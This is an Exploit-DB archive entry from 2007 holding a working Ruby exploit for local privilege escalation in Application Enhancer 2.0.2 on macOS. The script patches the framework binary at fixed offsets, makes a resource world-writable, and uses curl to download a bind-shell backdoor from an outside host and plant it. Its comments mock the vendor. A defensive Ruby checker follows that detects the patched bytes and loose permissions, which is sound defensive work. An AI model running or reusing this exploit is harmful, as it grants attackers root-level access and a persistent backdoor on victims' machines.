Application Enhancer (APE) 2.0.2 - Local Privilege Escalation

08 Jan 2007 00:00:00 - Reported by MoAB - Type: exploitdb - Source: www.exploit-db.com

APE 2.0.2 Local Privilege Escalation - Exploit of the Ape

Code
#!/usr/bin/ruby
# Exploit Of The Apes: A practical pwnage for Application (UN)Enhancer aka APU
# (c) 2006 LMH <lmh [at] info-pull.com> and Johnny Pwnerseed.
#
# This goes dedicated to #macdev. For the childish flaming and great brain lag.
#
# Lesson: Don't talk about stuff you have NFC about. And don't insult
# people. Once you do it, and get pwned, total lulz ensues ;o(
#
# MD5 (ApplicationEnhancer) = cf9bf1fa74f8298f09aedce38c72a7da
# at offset 27512   0x807d0014      ->  0x38600000
# at offset 115586  0x8b4614890424  ->  0x31c090890424
# 

require 'fileutils'

# Define offsets to opcodes to be patched
PATCH_INSTRUCTIONS =  [
                        [ 27512,  "\x38\x60\x00\x00"         ],
                        [ 115586, "\x31\xc0\x90\x89\x04\x24" ]
                      ]

BACKDOO_URL = "http://projects.info-pull.com/moab/bug-files/sample-back" # must be fat binary, sample bind shell
PATH_TO_APE = "/Library/Frameworks/ApplicationEnhancer.framework"
PATH_TO_APU = "/Library/Frameworks/ApplicationUnenhancer.framework"

path_to_bozo  = (ARGV[0] || File.join(PATH_TO_APE,"Versions/Current/ApplicationEnhancer"))

puts "++ Starting: #{PATH_TO_APE}"
puts "++ Back-up:  #{PATH_TO_APU}"
# Move the original framework to back-up, copy contents back, set permissions.
# To repair:
# rm -rf /Library/Frameworks/ApplicationEnhancer.framework
# mv /Library/Frameworks/ApplicationUnenhancer.framework \
# /Library/Frameworks/ApplicationEnhancer.framework
if File.exists?(PATH_TO_APE)
  unless File.exists?(PATH_TO_APU)
    FileUtils.mv(PATH_TO_APE, PATH_TO_APU)
    FileUtils.cp_r(PATH_TO_APU, PATH_TO_APE)
    system "chmod u+w #{File.join(PATH_TO_APE, "Versions/A/ApplicationEnhancer")}"
  end
end

# Patching poor Apu (we could just replace the binary, but this is cooler as the
# guys at Unsanity, LLC think they can dropriv and forget all about flawed code...).
bozo    = File.read(path_to_bozo)

puts "++ Patch: #{path_to_bozo}"
PATCH_INSTRUCTIONS.each do |patch|
  offset  = patch[0] # start offset
  bindata = patch[1] # patch bytes
  bcount  = 0

  puts "++ Patching stage: offset=#{offset} patch size=#{bindata.size}"
  bindata.split(//).each do |patch_byte|
    target_offset = offset + bcount
    printf "++ Patching byte at %x\n", target_offset
    bozo[target_offset] = patch_byte
    bcount += 1
  end
end

puts "++ Binary pwnage done. Writing patched data..."
u_bozo = File.new(File.join(PATH_TO_APE, "/Versions/A/ApplicationEnhancer"), "w")
u_bozo.write(bozo)
u_bozo.close
puts "++ Done (#{bozo.size} bytes). Planting backdoor aped binary..."

aped_path = File.join(PATH_TO_APE, "Resources/aped")
system "chmod a+rxw #{aped_path}" # let everyone backdoor it afterwards, be social and share!
system "curl #{BACKDOO_URL} -o #{aped_path}"
system "chmod a+x #{aped_path}"

puts "++ Finished."

# milw0rm.com [2007-01-08]
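An added defender-side integrity check, not part of the exploit above or of Unsanity's code: it compares the bytes at the two offsets documented in the exploit header against the original and patched sequences listed there, gives a verdict for a binary image, and flags group- or world-writable mode bits like the ones the script leaves on Resources/aped. The sample image is constructed here and is not a real ApplicationEnhancer binary; the known-good MD5 is the one quoted in the header.

```ruby
require 'digest'

# Known-good MD5 of the unpatched binary, as quoted in the exploit header.
KNOWN_GOOD_MD5 = "cf9bf1fa74f8298f09aedce38c72a7da"

# [offset, original bytes, bytes the exploit writes], taken from the exploit header.
PATCH_SITES = [
  [27512,  "\x80\x7d\x00\x14".b,         "\x38\x60\x00\x00".b],
  [115586, "\x8b\x46\x14\x89\x04\x24".b, "\x31\xc0\x90\x89\x04\x24".b],
].freeze

# Classify each patch site in a binary image: :original, :patched, :unknown or :short.
def classify_sites(image, sites = PATCH_SITES)
  sites.map do |offset, original, patched|
    slice = image.byteslice(offset, original.bytesize)
    state = if slice.nil? || slice.bytesize < original.bytesize then :short
            elsif slice == original then :original
            elsif slice == patched then :patched
            else :unknown
            end
    { offset: offset, state: state }
  end
end

# Overall verdict for one image of ApplicationEnhancer (pass File.binread(path)).
def ape_verdict(image)
  return :intact if Digest::MD5.hexdigest(image) == KNOWN_GOOD_MD5
  states = classify_sites(image).map { |s| s[:state] }
  return :patched_by_exploit if states.include?(:patched)
  return :modified if states.any? { |s| s != :original }
  :hash_mismatch # different build or version; the documented sites are untouched
end

# True when group or other have write permission, as "chmod a+rxw" leaves it.
def lax_mode?(mode)
  (mode & 0o022) != 0
end

# Constructed sample image (not a real ApplicationEnhancer): zero-filled, with the
# original bytes placed at the documented offsets, optionally patched as the exploit does.
def build_sample(patched: false)
  image = "\x00".b * 120_000
  PATCH_SITES.each do |offset, original, patch|
    image[offset, original.bytesize] = patched ? patch : original
  end
  image
end

puts "patched sample: #{ape_verdict(build_sample(patched: true))}" if __FILE__ == $0
```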
